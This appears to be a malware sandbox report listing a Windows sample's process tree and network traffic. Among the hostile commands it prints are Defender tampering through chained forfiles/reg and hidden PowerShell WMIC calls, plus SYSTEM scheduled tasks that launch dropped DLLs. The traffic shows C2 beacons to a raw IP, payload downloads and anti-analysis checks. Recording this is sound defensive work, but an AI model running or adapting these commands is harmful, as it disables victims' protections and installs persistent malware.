\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 1844)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 4280)
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 1200)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 5828)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5408)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 5416)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 6108)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5548)
  Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 5540)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 2096)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 4960)
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 6044)
  Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 5112)
  Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\gpupdate.exe (depth 6, PID 4852)
  Command line: "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5600)
  Command line: schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 4224)
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\System32\Conhost.exe (depth 3, PID 5308)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5332)
  Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 3956)
  Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 5428)
  Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 6, PID 876)
  Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5296)
  Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\kcXDqX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  Signatures:
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5976)
  Command line: schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\jgzmjeb.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 6000)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5172)
  Command line: schtasks /END /TN "FPieTEPPuEmJrhC"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 2056)
  Command line: schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 3624)
  Command line: schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\snzniaG.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 5112)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 1392)
  Command line: schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\GGaXytC.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 5828)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 3660)
  Command line: schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\SEacfvq.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4224)
  Command line: schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\lANuDZv.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 2100)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4340)
  Command line: schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 09:38:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\skQuQXsK\CrvewHV.dll\",#1 /eetYdidZX 385118" /V1 /F
  Signatures:
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 596)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 2556)
  Command line: schtasks /run /I /tn "rrqYunoktxOQmCoCX"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5296)
  Command line: schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FhZPPvs.exe (depth 1, PID 5788)
  Command line: C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FhZPPvs.exe GH /yiqudidnn 385118 /S
  Signatures:
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 3596)
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 1056)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 5540)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 876)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5272)
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 3660)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 6112)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5948)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 5492)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 5140)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 596)
  Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 5988)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe (depth 5, PID 6000)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5940)
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 2180)
  Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 5744)
  Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory

C:\Windows\SysWOW64\gpupdate.exe (depth 6, PID 5764)
  Command line: "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe (depth 7, PID 5592)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4552)
  Command line: schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 6000)
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\System32\Conhost.exe (depth 3, PID 5964)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5564)
  Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 520)
  Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 1252)
  Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 6, PID 5612)
  Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 6004)
  Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\HzvOZz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  Signatures:
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4912)
  Command line: schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\BcSeElW.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5600)
  Command line: schtasks /END /TN "FPieTEPPuEmJrhC"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5300)
  Command line: schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 3656)
  Command line: schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\phqMPFN.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 4248)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5876)
  Command line: schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\jCBbjKQ.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5896)
  Command line: schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\uvvouwo.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 5428)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 3160)
  Command line: schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\wKCalaf.xml" /RU "SYSTEM"
  Signatures:
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 5480)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 2948)
  Command line: schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
\??\c:\windows\system32\gpscript.exe (depth 1, PID 4524)
  Command line: gpscript.exe /RefreshSystemParam

\??\c:\windows\system32\rundll32.EXE (depth 1, PID 6140)
  Command line: c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\skQuQXsK\CrvewHV.dll",#1 /eetYdidZX 385118

C:\Windows\SysWOW64\rundll32.exe (depth 2, PID 5688)
  Command line: c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\skQuQXsK\CrvewHV.dll",#1 /eetYdidZX 385118
  Signatures:
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry

C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 3608)
  Command line: schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"

C:\Windows\system32\svchost.exe (depth 1, PID 5876)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc

\??\c:\windows\system32\svchost.exe (depth 1, PID 5496)
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s BITS

C:\Windows\System32\svchost.exe (depth 1, PID 5880)
  Command line: C:\Windows\System32\svchost.exe -k smphost

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe (depth 1, PID 5416)
  Command line: C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  Signatures:
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe (depth 1, PID 4276)
  Command line: C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe (depth 1, PID 5176)
  Command line: C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  Signatures:
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe (depth 1, PID 6084)
  Command line: C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

C:\Windows\windefender.exe (depth 1, PID 5852)
  Command line: C:\Windows\windefender.exe
  Signatures:
  - Modifies data under HKEY_USERS

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe (depth 1, PID 2556)
  Command line: C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  Signatures:
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe (depth 1, PID 6120)
  Command line: C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
Network

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 158
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Remote address: 193.233.132.56:80
Request:
GET /lend/swiiiii.exe HTTP/1.1
Host: 193.233.132.56
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 329352
Last-Modified: Sat, 30 Mar 2024 23:24:22 GMT
Connection: keep-alive
ETag: "66089f26-50688"
Accept-Ranges: bytes

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Remote address: 193.233.132.56:80
Request:
GET /lend/jok.exe HTTP/1.1
Host: 193.233.132.56
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:44 GMT
Content-Type: application/octet-stream
Content-Length: 311296
Last-Modified: Mon, 08 Apr 2024 13:25:04 GMT
Connection: keep-alive
ETag: "6613f030-4c000"
Accept-Ranges: bytes

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Remote address: 193.233.132.56:80
Request:
GET /lend/swiiii.exe HTTP/1.1
Host: 193.233.132.56
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:45 GMT
Content-Type: application/octet-stream
Content-Length: 162304
Last-Modified: Sat, 06 Apr 2024 02:31:48 GMT
Connection: keep-alive
ETag: "6610b414-27a00"
Accept-Ranges: bytes

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Remote address: 193.233.132.56:80
Request:
GET /lend/gold.exe HTTP/1.1
Host: 193.233.132.56
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:47 GMT
Content-Type: application/octet-stream
Content-Length: 578048
Last-Modified: Fri, 03 May 2024 14:34:59 GMT
Connection: keep-alive
ETag: "6634f613-8d200"
Accept-Ranges: bytes

Remote address: 193.233.132.56:80
Request:
POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Remote address: 193.233.132.56:80
Request:
GET /lend/alexxxxxxxx.exe HTTP/1.1
Host: 193.233.132.56
Response:
HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:50 GMT
Content-Type: application/octet-stream
Content-Length: 2831872
Last-Modified: Tue, 23 Apr 2024 20:08:15 GMT
Connection: keep-alive
ETag: "6628152f-2b3600"
Accept-Ranges: bytes

Remote address: 8.8.8.8:53
Request: 56.132.233.193.in-addr.arpa IN PTR
Response: (empty)
Remote address: 8.8.8.8:53
Request: affordcharmcropwo.shop IN A
Response:
affordcharmcropwo.shop IN A 104.21.67.211
affordcharmcropwo.shop IN A 172.67.181.34

Remote address: 104.21.67.211:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: affordcharmcropwo.shop
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=j4k845a3smrad0839shs51fpi5; expires=Thu, 29-Aug-2024 16:12:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Cmkax29RNy4tweI4L3PASkJCSc6wf2VanjJcH2jH6QW2YLvf0Nd85clb5smQIv%2FMf6XIgvI4Tv4GEVQzGvYI%2FtkafLf%2FS%2F%2F5kG2W9vH9ucDrpcDWGUxNJKGCxTlUq0Yey80AJV1ZVC3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425e9b855dc97-LHR
alt-svc: h3=":443"; ma=86400

Remote address: 104.21.67.211:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: affordcharmcropwo.shop
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=qiva4g9emfchio04ptm121m2b4; expires=Thu, 29-Aug-2024 16:12:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lbf4GGpnV2V804tAsxihECrMBHkC8WKVgRev3sxZDAMZBETS3MwX7wNX3f1ayMnC42Coid006%2Bf0S%2BWHzu%2FB%2FDPTQnmrry7i5YoUkrPX%2B%2BngiW%2Bz13TOF%2Brg3MeFpeg2jPaH2rp7VDhT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f50beedc97-LHR
alt-svc: h3=":443"; ma=86400

Remote address: 8.8.8.8:53
Request: cleartotalfisherwo.shop IN A
Response:
cleartotalfisherwo.shop IN A 104.21.72.132
cleartotalfisherwo.shop IN A 172.67.185.32

Remote address: 104.21.72.132:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cleartotalfisherwo.shop
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=prp467mqgckciksgc78t15s7vg; expires=Thu, 29-Aug-2024 16:12:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
